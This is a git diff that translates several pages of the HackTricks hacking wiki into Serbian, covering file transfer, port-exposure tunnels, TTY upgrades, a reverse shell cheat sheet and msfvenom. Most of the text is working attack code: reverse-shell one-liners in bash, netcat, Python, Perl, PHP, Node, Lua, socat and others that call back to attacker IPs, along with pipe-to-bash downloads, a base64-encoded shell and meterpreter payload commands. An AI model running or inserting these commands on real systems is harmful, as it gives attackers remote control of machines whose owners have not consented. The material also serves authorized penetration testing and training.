 ## VBScript
-
 ```bash
 Attacker> python -m SimpleHTTPServer 80
 ```
-
-**Victim**
-
+**Žrtva**
 ```bash
 echo strUrl = WScript.Arguments.Item(0) > wget.vbs
 echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
@@ -345,23 +294,16 @@ echo ts.Close >> wget.vbs
 ```bash
 cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
 ```
-
 ## Debug.exe
 
-The `debug.exe` program not only allows inspection of binaries but also has the **capability to rebuild them from hex**. This means that by providing an hex of a binary, `debug.exe` can generate the binary file. However, it's important to note that debug.exe has a **limitation of assembling files up to 64 kb in size**.
-
+Program `debug.exe` ne samo da omogućava inspekciju binarnih datoteka, već takođe ima **sposobnost da ih rekonstruiše iz heksadecimalnog formata**. To znači da pružanjem heksa binarne datoteke, `debug.exe` može generisati binarnu datoteku. Međutim, važno je napomenuti da `debug.exe` ima **ograničenje u sastavljanju datoteka do 64 kb veličine**.
 ```bash
 # Reduce the size
 upx -9 nc.exe
 wine exe2bat.exe nc.exe nc.txt
 ```
-
-Then copy-paste the text into the windows-shell and a file called nc.exe will be created.
-
-- [https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html](https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html)
+Zatim kopirajte i nalepite tekst u windows-shell i biće kreiran fajl pod nazivom nc.exe.
 
 ## DNS
 
-- [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/generic-hacking/reverse-shells/README.md b/src/generic-hacking/reverse-shells/README.md
index 9f8253367..9c5d45504 100644
--- a/src/generic-hacking/reverse-shells/README.md
+++ b/src/generic-hacking/reverse-shells/README.md
@@ -8,7 +8,7 @@
 
 # [**Full TTYs**](full-ttys.md)
 
-# **Auto-generated shells**
+# **Automatski generisane ljuske**
 
 - [**https://reverse-shell.sh/**](https://reverse-shell.sh/)
 - [**https://www.revshells.com/**](https://www.revshells.com/)
diff --git a/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md b/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md
index b52276fda..1afa1af2e 100644
--- a/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md
+++ b/src/generic-hacking/reverse-shells/expose-local-to-the-internet.md
@@ -1,13 +1,12 @@
-# Expose local to the internet
+# Izložite lokalno internetu
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**The goal of this page is to propose alternatives that allow AT LEAST to expose local raw TCP ports and local webs (HTTP) to the internet WITHOUT needing to install anything in the other server (only in local if needed).**
+**Cilj ove stranice je da predloži alternative koje omogućavaju DA BAR izlože lokalne sirove TCP portove i lokalne web stranice (HTTP) internetu BEZ potrebe za instalacijom bilo čega na drugom serveru (samo lokalno ako je potrebno).**
 
 ## **Serveo**
 
-From [https://serveo.net/](https://serveo.net/), it allows several http and port forwarding features **for free**.
-
+Sa [https://serveo.net/](https://serveo.net/), omogućava nekoliko http i port forwarding funkcija **besplatno**.
 ```bash
 # Get a random port from serveo.net to expose local port 4444
 ssh -R 0:localhost:4444 serveo.net
@@ -15,11 +14,9 @@ ssh -R 0:localhost:4444 serveo.net
 # Expose a web listening in localhost:300 in a random https URL
 ssh -R 80:localhost:3000 serveo.net
 ```
-
 ## SocketXP
 
-From [https://www.socketxp.com/download](https://www.socketxp.com/download), it allows to expose tcp and http:
-
+Sa [https://www.socketxp.com/download](https://www.socketxp.com/download), omogućava izlaganje tcp i http:
 ```bash
 # Expose tcp port 22
 socketxp connect tcp://localhost:22
@@ -27,11 +24,9 @@ socketxp connect tcp://localhost:22
 # Expose http port 8080
 socketxp connect http://localhost:8080
 ```
-
 ## Ngrok
 
-From [https://ngrok.com/](https://ngrok.com/), it allows to expose http and tcp ports:
-
+Sa [https://ngrok.com/](https://ngrok.com/), omogućava izlaganje http i tcp portova:
 ```bash
 # Expose web in 3000
 ngrok http 8000
@@ -39,11 +34,9 @@ ngrok http 8000
 # Expose port in 9000 (it requires a credit card, but you won't be charged)
 ngrok tcp 9000
 ```
-
 ## Telebit
 
-From [https://telebit.cloud/](https://telebit.cloud/) it allows to expose http and tcp ports:
-
+Sa [https://telebit.cloud/](https://telebit.cloud/) omogućava izlaganje http i tcp portova:
 ```bash
 # Expose web in 3000
 /Users/username/Applications/telebit/bin/telebit http 3000
@@ -51,11 +44,9 @@ From [https://telebit.cloud/](https://telebit.cloud/) it allows to expose http a
 # Expose port in 9000
 /Users/username/Applications/telebit/bin/telebit tcp 9000
 ```
-
 ## LocalXpose
 
-From [https://localxpose.io/](https://localxpose.io/), it allows several http and port forwarding features **for free**.
-
+Sa [https://localxpose.io/](https://localxpose.io/), omogućava nekoliko http i port forwarding funkcija **besplatno**.
 ```bash
 # Expose web in port 8989
 loclx tunnel http -t 8989
@@ -63,11 +54,9 @@ loclx tunnel http -t 8989
 # Expose tcp port in 4545 (requires pro)
 loclx tunnel tcp --port 4545
 ```
-
 ## Expose
 
-From [https://expose.dev/](https://expose.dev/) it allows to expose http and tcp ports:
-
+Sa [https://expose.dev/](https://expose.dev/) omogućava izlaganje http i tcp portova:
 ```bash
 # Expose web in 3000
 ./expose share http://localhost:3000
@@ -75,14 +64,11 @@ From [https://expose.dev/](https://expose.dev/) it allows to expose http and tcp
 # Expose tcp port in port 4444 (REQUIRES PREMIUM)
 ./expose share-port 4444
 ```
-
 ## Localtunnel
 
-From [https://github.com/localtunnel/localtunnel](https://github.com/localtunnel/localtunnel) it allows to expose http for free:
-
+Sa [https://github.com/localtunnel/localtunnel](https://github.com/localtunnel/localtunnel) omogućava izlaganje http-a besplatno:
 ```bash
 # Expose web in port 8000
 npx localtunnel --port 8000
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-hacking/reverse-shells/full-ttys.md b/src/generic-hacking/reverse-shells/full-ttys.md
index 32d0eb1d5..865a9332e 100644
--- a/src/generic-hacking/reverse-shells/full-ttys.md
+++ b/src/generic-hacking/reverse-shells/full-ttys.md
@@ -2,36 +2,25 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
-
 ## Full TTY
 
-Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found in the /etc/shells file This incident has been reported`. Also, note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
+Napomena: ljuska koju postavite u `SHELL` varijabli **mora** biti **navedena unutar** _**/etc/shells**_ ili `Vrednost za SHELL varijablu nije pronađena u /etc/shells datoteci Ovaj incident je prijavljen`. Takođe, imajte na umu da sledeći snippeti rade samo u bash-u. Ako ste u zsh, pređite na bash pre nego što dobijete ljusku pokretanjem `bash`.
 
 #### Python
-
 ```bash
 python3 -c 'import pty; pty.spawn("/bin/bash")'
 
 (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
 ```
-
 > [!NOTE]
-> You can get the **number** of **rows** and **columns** executing **`stty -a`**
+> Možete dobiti **broj** **redova** i **kolona** izvršavanjem **`stty -a`**
 
 #### script
-
 ```bash
 script /dev/null -qc /bin/bash #/dev/null is to not store anything
 (inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
 ```
-
 #### socat
-
 ```bash
 #Listener:
 socat file:`tty`,raw,echo=0 tcp-listen:4444
@@ -39,8 +28,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
 #Victim:
 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
 ```
-
-### **Spawn shells**
+### **Pokretanje ljuski**
 
 - `python -c 'import pty; pty.spawn("/bin/sh")'`
 - `echo os.system('/bin/bash')`
@@ -57,39 +45,32 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
 
 ## ReverseSSH
 
-A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target.
+Pogodan način za **interaktivni pristup ljusci**, kao i **prenos fajlova** i **prosleđivanje portova**, je postavljanje statički povezanog ssh servera [ReverseSSH](https://github.com/Fahrj/reverse-ssh) na cilj.
 
-Below is an example for `x86` with upx-compressed binaries. For other binaries, check [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/).
-
-1. Prepare locally to catch the ssh port forwarding request:
+Ispod je primer za `x86` sa upx-kompresovanim binarnim datotekama. Za druge binarne datoteke, proverite [releases page](https://github.com/Fahrj/reverse-ssh/releases/latest/).
 
+1. Pripremite lokalno da uhvatite zahtev za prosleđivanje ssh porta:
 ```bash
 # Drop it via your preferred way, e.g.
 wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
 
 /dev/shm/reverse-ssh -v -l -p 4444
 ```
-
-- (2a) Linux target:
-
+- (2a) Linux cilj:
 ```bash
 # Drop it via your preferred way, e.g.
 wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
 
 /dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
 ```
-
-- (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):
-
+- (2b) Windows 10 cilj (za ranije verzije, proverite [project readme](https://github.com/Fahrj/reverse-ssh#features)):
 ```bash
 # Drop it via your preferred way, e.g.
 certutil.exe -f -urlcache https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86.exe reverse-ssh.exe
 
 reverse-ssh.exe -p 4444 kali@10.0.0.2
 ```
-
-- If the ReverseSSH port forwarding request was successful, you should now be able to log in with the default password `letmeinbrudipls` in the context of the user running `reverse-ssh(.exe)`:
-
+- Ako je zahtev za preusmeravanje porta ReverseSSH bio uspešan, sada biste trebali moći da se prijavite sa podrazumevanom lozinkom `letmeinbrudipls` u kontekstu korisnika koji pokreće `reverse-ssh(.exe)`:
 ```bash
 # Interactive shell access
 ssh -p 8888 127.0.0.1
@@ -97,25 +78,16 @@ ssh -p 8888 127.0.0.1
 # Bidirectional file transfer
 sftp -P 8888 127.0.0.1
 ```
-
 ## Penelope
 
-[Penelope](https://github.com/brightio/penelope) automatically upgrades Linux reverse shells to TTY, handles the terminal size, logs everything and much more. Also it provides readline support for Windows shells.
+[Penelope](https://github.com/brightio/penelope) automatski unapređuje Linux reverse shells u TTY, upravlja veličinom terminala, beleži sve i još mnogo toga. Takođe pruža readline podršku za Windows shells.
 
 ![penelope](https://github.com/user-attachments/assets/27ab4b3a-780c-4c07-a855-fd80a194c01e)
 
 ## No TTY
 
-If for some reason you cannot obtain a full TTY you **still can interact with programs** that expect user input. In the following example, the password is passed to `sudo` to read a file:
-
+Ako iz nekog razloga ne možete dobiti pun TTY, **i dalje možete interagovati sa programima** koji očekuju korisnički unos. U sledećem primeru, lozinka se prosleđuje `sudo` da bi se pročitala datoteka:
 ```bash
 expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact'
 ```
-
-

-
-Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified:
-
-{% embed url="https://academy.8ksec.io/" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/generic-hacking/reverse-shells/linux.md b/src/generic-hacking/reverse-shells/linux.md
index c1caa101d..909b1e184 100644
--- a/src/generic-hacking/reverse-shells/linux.md
+++ b/src/generic-hacking/reverse-shells/linux.md
@@ -2,14 +2,13 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)
+**Ako imate pitanja o bilo kojoj od ovih ljuski, možete ih proveriti na** [**https://explainshell.com/**](https://explainshell.com)
 
 ## Full TTY
 
-**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**
+**Kada dobijete reverznu ljusku**[ **pročitajte ovu stranicu da biste dobili pun TTY**](full-ttys.md)**.**
 
 ## Bash | sh
-
 ```bash
 curl https://reverse-shell.sh/1.1.1.1:3000 | bash
 bash -i >& /dev/tcp// 0>&1
@@ -22,11 +21,9 @@ exec 5<>/dev/tcp//; while read line 0<&5; do $line 2>&5 >&5;
 #after getting the previous shell to get the output to execute
 exec >&0
 ```
+Ne zaboravite da proverite sa drugim shell-ovima: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh i bash.
 
-Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash.
-
-### Symbol safe shell
-
+### Siguran simbol shell
 ```bash
 #If you need a more stable connection do:
 bash -c 'bash -i >& /dev/tcp// 0>&1'
@@ -35,74 +32,66 @@ bash -c 'bash -i >& /dev/tcp// 0>&1'
 #B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
 echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
 ```
+#### Objašnjenje shell-a
 
-#### Shell explanation
-
-1. **`bash -i`**: This part of the command starts an interactive (`-i`) Bash shell.
-2. **`>&`**: This part of the command is a shorthand notation for **redirecting both standard output** (`stdout`) and **standard error** (`stderr`) to the **same destination**.
-3. **`/dev/tcp//`**: This is a special file that **represents a TCP connection to the specified IP address and port**.
-   - By **redirecting the output and error streams to this file**, the command effectively sends the output of the interactive shell session to the attacker's machine.
-4. **`0>&1`**: This part of the command **redirects standard input (`stdin`) to the same destination as standard output (`stdout`)**.
-
-### Create in file and execute
+1. **`bash -i`**: Ovaj deo komande pokreće interaktivni (`-i`) Bash shell.
+2. **`>&`**: Ovaj deo komande je skraćena notacija za **preusmeravanje standardnog izlaza** (`stdout`) i **standardne greške** (`stderr`) na **istu destinaciju**.
+3. **`/dev/tcp//`**: Ovo je poseban fajl koji **predstavlja TCP vezu sa navedenom IP adresom i portom**.
+- Preusmeravanjem izlaza i tokova grešaka na ovaj fajl, komanda efikasno šalje izlaz interaktivne shell sesije na mašinu napadača.
+4. **`0>&1`**: Ovaj deo komande **preusmerava standardni ulaz (`stdin`) na istu destinaciju kao standardni izlaz (`stdout`)**.
 
+### Kreiraj u fajlu i izvrši
 ```bash
 echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1/ 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
 wget http:///shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
 ```
-
 ## Forward Shell
 
-When dealing with a **Remote Code Execution (RCE)** vulnerability within a Linux-based web application, achieving a reverse shell might be obstructed by network defenses like iptables rules or intricate packet filtering mechanisms. In such constrained environments, an alternative approach involves establishing a PTY (Pseudo Terminal) shell to interact with the compromised system more effectively.
+Kada se suočavate sa **Remote Code Execution (RCE)** ranjivošću unutar Linux-bazirane web aplikacije, postizanje reverse shell-a može biti otežano mrežnim odbranama poput iptables pravila ili složenih mehanizama filtriranja paketa. U takvim ograničenim okruženjima, alternativni pristup uključuje uspostavljanje PTY (Pseudo Terminal) shell-a za efikasniju interakciju sa kompromitovanim sistemom.
 
-A recommended tool for this purpose is [toboggan](https://github.com/n3rada/toboggan.git), which simplifies interaction with the target environment.
-
-To utilize toboggan effectively, create a Python module tailored to the RCE context of your target system. For example, a module named `nix.py` could be structured as follows:
+Preporučeni alat za ovu svrhu je [toboggan](https://github.com/n3rada/toboggan.git), koji pojednostavljuje interakciju sa ciljnim okruženjem.
 
+Da biste efikasno koristili toboggan, kreirajte Python modul prilagođen RCE kontekstu vašeg ciljnog sistema. Na primer, modul nazvan `nix.py` mogao bi biti strukturiran na sledeći način:
 ```python3
 import jwt
 import httpx
 
 def execute(command: str, timeout: float = None) -> str:
-    # Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
-    token = jwt.encode(
-        {"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
-    )
+# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
+token = jwt.encode(
+{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
+)
 
-    response = httpx.get(
-        url="https://vulnerable.io:3200",
-        headers={"Authorization": f"Bearer {token}"},
-        timeout=timeout,
-        # ||BURP||
-        verify=False,
-    )
+response = httpx.get(
+url="https://vulnerable.io:3200",
+headers={"Authorization": f"Bearer {token}"},
+timeout=timeout,
+# ||BURP||
+verify=False,
+)
 
-    # Check if the request was successful
-    response.raise_for_status()
+# Check if the request was successful
+response.raise_for_status()
 
-    return response.text
+return response.text
 ```
-
-And then, you can run:
-
+I onda možete pokrenuti:
 ```shell
 toboggan -m nix.py -i
 ```
+Da direktno iskoristite interaktivnu ljusku. Možete dodati `-b` za Burpsuite integraciju i ukloniti `-i` za osnovniji rce omotač.
 
-To directly leverage an interractive shell. You can add `-b` for Burpsuite integration and remove the `-i` for a more basic rce wrapper.
+Druga mogućnost je korišćenje `IppSec` forward shell implementacije [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell).
 
-Another possibility consist using the `IppSec` forward shell implementation [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell).
+Samo treba da modifikujete:
 
-You just need to modify:
+- URL ranjivog hosta
+- Prefiks i sufiks vašeg payload-a (ako ih ima)
+- Način na koji se payload šalje (zaglavlja? podaci? dodatne informacije?)
 
-- The URL of the vulnerable host
-- The prefix and suffix of your payload (if any)
-- The way the payload is sent (headers? data? extra info?)
-
-Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
+Zatim, možete jednostavno **slati komande** ili čak **koristiti `upgrade` komandu** da dobijete pun PTY (napomena: cevi se čitaju i pišu sa približno 1.3s kašnjenjem).
 
 ## Netcat
-
 ```bash
 nc -e /bin/sh  
 nc   | /bin/sh #Blind
@@ -110,42 +99,32 @@ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc   >/tmp
 nc  | /bin/bash | nc  
 rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0  1>/tmp/bkpipe
 ```
-
 ## gsocket
 
-Check it in [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
-
+Proverite to na [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
 ```bash
 bash -c "$(curl -fsSL gsocket.io/x)"
 ```
-
 ## Telnet
-
 ```bash
 telnet   | /bin/sh #Blind
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet   >/tmp/f
 telnet   | /bin/bash | telnet  
 rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0  1>/tmp/bkpipe
 ```
-
 ## Whois
 
-**Attacker**
-
+**Napadač**
 ```bash
 while true; do nc -l ; done
 ```
+Da biste poslali komandu, otkucajte je, pritisnite enter i pritisnite CTRL+D (da zaustavite STDIN)
 
-To send the command write it down, press enter and press CTRL+D (to stop STDIN)
-
-**Victim**
-
+**Žrtva**
 ```bash
 export X=Connected; while true; do X=`eval $(whois -h  -p  "Output: $X")`; sleep 1; done
 ```
-
-## Python
-
+## Питон
 ```bash
 #Linux
 export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
@@ -153,23 +132,17 @@ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC
 #IPv6
 python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
 ```
-
 ## Perl
-
 ```bash
 perl -e 'use Socket;$i="";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
 perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
 ```
-
-## Ruby
-
+## Руби
 ```bash
 ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
 ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 ```
-
 ## PHP
-
 ```php
 // Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
 // Using this method may lead to instances where the connection reaches out to the listener and then closes.
@@ -181,51 +154,41 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
 
 /dev/tcp/10.10.14.8/4444 0>&1'"); ?>
 ```
-
 ## Java
-
 ```bash
 r = Runtime.getRuntime()
 p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 p.waitFor()
 ```
-
 ## Ncat
-
 ```bash
 victim> ncat   --ssl  -c  "bash -i 2>&1"
 attacker> ncat -l  --ssl
 ```
-
 ## Golang
-
 ```bash
 echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
 ```
-
 ## Lua
-
 ```bash
 #Linux
 lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
 #Windows & Linux
 lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 ```
-
 ## NodeJS
-
 ```javascript
 (function(){
-    var net = require("net"),
-        cp = require("child_process"),
-        sh = cp.spawn("/bin/sh", []);
-    var client = new net.Socket();
-    client.connect(8080, "10.17.26.64", function(){
-        client.pipe(sh.stdin);
-        sh.stdout.pipe(client);
-        sh.stderr.pipe(client);
-    });
-    return /a/; // Prevents the Node.js application form crashing
+var net = require("net"),
+cp = require("child_process"),
+sh = cp.spawn("/bin/sh", []);
+var client = new net.Socket();
+client.connect(8080, "10.17.26.64", function(){
+client.pipe(sh.stdin);
+sh.stdout.pipe(client);
+sh.stderr.pipe(client);
+});
+return /a/; // Prevents the Node.js application form crashing
 })();
 
 
@@ -256,19 +219,15 @@ or
 
 https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 ```
-
 ## OpenSSL
 
-The Attacker (Kali)
-
+Napadač (Kali)
 ```bash
 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
 openssl s_server -quiet -key key.pem -cert cert.pem -port  #Here you will be able to introduce the commands
 openssl s_server -quiet -key key.pem -cert cert.pem -port  #Here yo will be able to get the response
 ```
-
-The Victim
-
+Žrtva
 ```bash
 #Linux
 openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect :
@@ -276,103 +235,84 @@ openssl s_client -quiet -connect :|/bin/bash|openssl s_clien
 #Windows
 openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect :
 ```
-
 ## **Socat**
 
 [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
 
 ### Bind shell
-
 ```bash
 victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
 attacker> socat FILE:`tty`,raw,echo=0 TCP::1337
 ```
-
-### Reverse shell
-
+### Obrnuta ljuska
 ```bash
 attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
 victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane
 ```
-
 ## Awk
-
 ```bash
 awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
 ```
-
 ## Finger
 
-**Attacker**
-
+**Napadač**
 ```bash
 while true; do nc -l 79; done
 ```
+Da biste poslali komandu, otkucajte je, pritisnite enter i pritisnite CTRL+D (da zaustavite STDIN)
 
-To send the command write it down, press enter and press CTRL+D (to stop STDIN)
-
-**Victim**
-
+**Žrtva**
 ```bash
 export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null')`; sleep 1; done
 
 export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done
 ```
-
 ## Gawk
-
 ```bash
 #!/usr/bin/gawk -f
 
 BEGIN {
-        Port    =       8080
-        Prompt  =       "bkd> "
+Port    =       8080
+Prompt  =       "bkd> "
 
-        Service = "/inet/tcp/" Port "/0/0"
-        while (1) {
-                do {
-                        printf Prompt |& Service
-                        Service |& getline cmd
-                        if (cmd) {
-                                while ((cmd |& getline) > 0)
-                                        print $0 |& Service
-                                close(cmd)
-                        }
-                } while (cmd != "exit")
-                close(Service)
-        }
+Service = "/inet/tcp/" Port "/0/0"
+while (1) {
+do {
+printf Prompt |& Service
+Service |& getline cmd
+if (cmd) {
+while ((cmd |& getline) > 0)
+print $0 |& Service
+close(cmd)
+}
+} while (cmd != "exit")
+close(Service)
+}
 }
 ```
-
 ## Xterm
 
-This will try to connect to your system at port 6001:
-
+Ovo će pokušati da se poveže sa vašim sistemom na portu 6001:
 ```bash
 xterm -display 10.0.0.1:1
 ```
-
-To catch the reverse shell you can use (which will listen in port 6001):
-
+Da biste uhvatili reverznu školjku, možete koristiti (koja će slušati na portu 6001):
 ```bash
 # Authorize host
 xhost +targetip
 # Listen
 Xnest :1
 ```
-
 ## Groovy
 
-by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NOTE: Java reverse shell also work for Groovy
-
+by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) NAPOMENA: Java reverse shell takođe radi za Groovy
 ```bash
 String host="localhost";
 int port=8044;
 String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 ```
-
-## References
+## Reference
 
 - [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
 - [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell)
diff --git a/src/generic-hacking/reverse-shells/msfvenom.md b/src/generic-hacking/reverse-shells/msfvenom.md
index 49444f77b..4996f6db2 100644
--- a/src/generic-hacking/reverse-shells/msfvenom.md
+++ b/src/generic-hacking/reverse-shells/msfvenom.md
@@ -2,38 +2,20 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
-
-**Hacking Insights**\
-Engage with content that delves into the thrill and challenges of hacking
-
-**Real-Time Hack News**\
-Keep up-to-date with fast-paced hacking world through real-time news and insights
-
-**Latest Announcements**\
-Stay informed with the newest bug bounties launching and crucial platform updates
-
-**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
-
 ---
 
-## Basic msfvenom
+## Osnovni msfvenom
 
 `msfvenom -p  -e  -f  -i  LHOST=`
 
-One can also use the `-a` to specify the architecture or the `--platform`
+Može se takođe koristiti `-a` za specifikaciju arhitekture ili `--platform`
 
 ## Listing
-
 ```bash
 msfvenom -l payloads #Payloads
 msfvenom -l encoders #Encoders
 ```
-
-## Common params when creating a shellcode
-
+## Uobičajeni parametri prilikom kreiranja shellcode-a
 ```bash
 -b "\x00\x0a\x0d"
 -f c
@@ -41,162 +23,106 @@ msfvenom -l encoders #Encoders
 EXITFUNC=thread
 PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
 ```
-
 ## **Windows**
 
-### **Reverse Shell**
-
+### **Obrnuta ljuska**
 ```bash
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
 ```
-
 ### Bind Shell
-
 ```bash
 msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
 ```
-
-### Create User
-
+### Kreiraj korisnika
 ```bash
